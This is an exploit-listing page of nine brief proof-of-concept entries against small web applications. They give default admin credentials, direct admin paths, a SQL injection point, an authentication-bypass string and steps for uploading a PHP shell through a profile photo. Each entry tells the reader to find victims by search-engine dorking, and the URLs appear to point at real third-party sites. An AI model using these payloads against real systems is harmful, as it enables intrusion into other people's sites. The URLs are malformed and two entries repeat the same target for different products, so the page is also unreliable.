Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : Ingredient Stock Management System v1.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://scriptmafia.org | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin & pass = admin123 [+] https://www/127.0.0.1/yoruanwitness000webhostappcom/admin/?page=clients Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : ChatBot Application with a Suggestion Feature v1.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.sourcecodester.com/user/257130/activity | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin & pass = admin123 [+] https://www/127.0.0.1/yoruanwitness000webhostappcom/admin/?page=clients Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : Bhojon restaurant management system v2.7 IDOR Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.bdtask.com/restaurant-management-system.php#live_demo | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface. [+] use payload : /dashboard/autoupdate [+] https://www/127.0.0.1/cloud9-cafecom/dashboard/autoupdate Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : SIM Wisuda v1.0 IDOR Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://academic.uii.ac.id/wisuda/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface. [+] use payload : /login/apps/?menu=Lulusan [+] https://www/127.0.0.1/wisuda.uika-bogor.ac.id/login/apps/?menu=Lulusan Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : SLiMS CMS v2.0 Sql injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://slims.web.id/web/news/slims-competition-plugin-and-template/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : "index.php?p=show_detail&id=471"<===== inject here [+] https://www/127.0.0.1/libman1blitarschid/index.php?p=show_detail&id=471 Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : UBM CMS v1.2 IDOR Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.1 (64 bits) | | # Vendor : https://ubminfotech.com/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /admin/header.php [+] https://www/127.0.0.1/orrerydrugs.com/admin/header.php [+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface. Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : TAIF LMS v5.8.0 shell upload Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : http://lmsv3.mmgulf.com/public/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] TAIF learning script contain arbitrary file upload [+] registered user can upload .php files in profile picture section without any security [+] profile link : localhost/demo/public/profile/show/ [+] profile link : /demo/public/profile/show/ [+] edit profile photo and upload php files and inspect element your php direction [+] uploaded file direction :local host /demo/public/images/user_img/16067501901.php <---- random id [+] just right click the photo and use inspect element you will have your direction Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : Vencorp v 2.1.1 Auth by Pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://themeforest.net/item/elegant-responsive-html5-w-animated-metro-slider/5440458?ref=Venmond | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : USer = 'or''='@gmail.com pass = 'or''=' [+] https://www/127.0.0.1/venmondcom/demo/vendroid/ Greetings to :================================================= jericho * Larry W. Cashdollar *LiquidWorm * Hussin-X * D4NB4R | =============================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Webdenim AppUI v1.0 IDOR Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://codentheme.com/item/appui-free-responsive-html-vuejs-angularjs-admin-dashboard/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface. [+] use payload : //admin/header.php [+] https://www/127.0.0.1/listandrelaxcom/admin/header.php Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>